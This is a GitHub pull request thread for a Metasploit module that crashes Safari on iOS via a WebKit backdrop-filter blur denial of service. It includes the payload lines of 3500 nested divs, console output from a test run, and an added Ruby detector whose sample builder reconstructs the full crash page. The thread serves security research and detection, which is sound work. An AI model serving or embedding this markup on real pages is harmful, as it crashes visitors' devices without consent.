
Add iOS Safari Webkit Blur Denial of Service #10652

Merged
acammack-r7 merged 3 commits into rapid7:master from timwr:ios_blur_dos
Sep 19, 2018

Conversation

@timwr (Contributor)

@timwr timwr commented Sep 16, 2018

Add a module that demonstrates a denial of service on Safari Webkit.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur
  • Visit the url on an iOS device
  • Verify the device re-springs

@timwr timwr added the ios label Sep 16, 2018
@timwr (Contributor, Author)

timwr commented Sep 16, 2018

Ping @pwnsdx

Inline review on these module lines:

```ruby
# diff context: the page markup ends with <body>, then the nested divs are appended
html += "<div>" * 3500
html += "</div>" * 3500
```
Contributor (inline review comment):

You could probably include this inside the block using string interpolation.

```ruby
#{'<div>' * 3500}#{'</div>' * 3500}
```
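As an added defender-side example (not code from the PR, the module or its author), a Ruby check that measures element nesting depth and flags markup that pairs a backdrop-filter rule with the thousands of nested divs discussed above; the 1000-deep threshold and the constructed sample page are assumptions.

```ruby
# Added example: detect the "backdrop-filter + very deep nesting" pattern.
# The threshold and the sample builder are assumptions, not module code.

VOID_ELEMENTS = %w[area base br col embed hr img input link meta param
                   source track wbr].freeze

# Constructed sample modelled on the module's markup: a backdrop-filter
# style followed by `depth` nested, then closed, <div> elements.
def build_sample(depth)
  "<html><head><style>div{-webkit-backdrop-filter:blur(10px)}</style></head>" \
    "<body>#{'<div>' * depth}#{'</div>' * depth}</body></html>"
end

# Walks start/end tags with a simple scanner and returns the deepest
# nesting level seen. Void and self-closing tags do not change depth.
def max_nesting_depth(html)
  depth = 0
  deepest = 0
  html.scan(%r{<(/?)([a-zA-Z][a-zA-Z0-9-]*)[^>]*?(/?)>}) do |closing, name, selfclose|
    next if VOID_ELEMENTS.include?(name.downcase) || selfclose == '/'
    if closing == '/'
      depth -= 1 if depth > 0
    else
      depth += 1
      deepest = depth if depth > deepest
    end
  end
  deepest
end

# True when any (prefixed or unprefixed) backdrop-filter declaration appears.
def uses_backdrop_filter?(html)
  !!(html =~ /(-webkit-)?backdrop-filter\s*:/i)
end

# Both signals must be present; 1000 is an assumed threshold, well below
# the 3500 the module uses but far above anything a normal page nests.
def suspicious_blur_nesting?(html, depth_threshold: 1000)
  uses_backdrop_filter?(html) && max_nesting_depth(html) >= depth_threshold
end

if __FILE__ == $PROGRAM_NAME
  sample = build_sample(3500)
  puts "depth=#{max_nesting_depth(sample)} suspicious=#{suspicious_blur_nesting?(sample)}"
end
```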

@bcoles (Contributor)

bcoles commented Sep 16, 2018

Works as described. Tested on iOS 11.4.1.

```
msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set uripath asdf
uripath => asdf
msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run
[*] Auxiliary module running as background job 1.

[*] Using URL: http://0.0.0.0:8080/asdf
[*] Local IP: http://10.1.1.197:8080/asdf
[*] Server started.
msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > [*] Sending response
```

@ghost

ghost commented Sep 16, 2018

Ping @pwnsdx

I don't approve. Thomas the Tank Engine is not present.

..

Just kidding 🤣 My name is Sabri Haddouche if you need more information for the author field 😉

@acammack-r7 acammack-r7 merged commit a9b9e74 into rapid7:master Sep 19, 2018
acammack-r7 added a commit that referenced this pull request Sep 19, 2018
@acammack-r7 (Contributor)

acammack-r7 commented Sep 19, 2018

Release Notes

A Denial-of-Service exploit that targets Safari on iOS devices that causes the display process to restart has been added to the framework.

@wvu (Contributor)

wvu commented Sep 19, 2018

We tested on my phone, lolol. Thanks for the fast PR!

@bcoles (Contributor)

bcoles commented Sep 20, 2018

I would have merged this days ago, within hours of the initial PR, if module documentation was provided.

Do include Module Documentation showing sample run-throughs.

Please advise in which circumstances the rules do not apply, and why.

@timwr (Contributor, Author)

timwr commented Sep 24, 2018

Apologies. I meant to add documentation but got distracted.
I'll add some documentation now separately, I'll also add the IP and User-Agent to the status message.

@timwr timwr deleted the ios_blur_dos branch September 24, 2018 09:10
timwr added a commit to timwr/metasploit-framework that referenced this pull request Sep 24, 2018
timwr added a commit to timwr/metasploit-framework that referenced this pull request Sep 24, 2018
luisfcolon added a commit to luisfcolon/metasploit-framework that referenced this pull request Sep 25, 2018
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Sep 26, 2018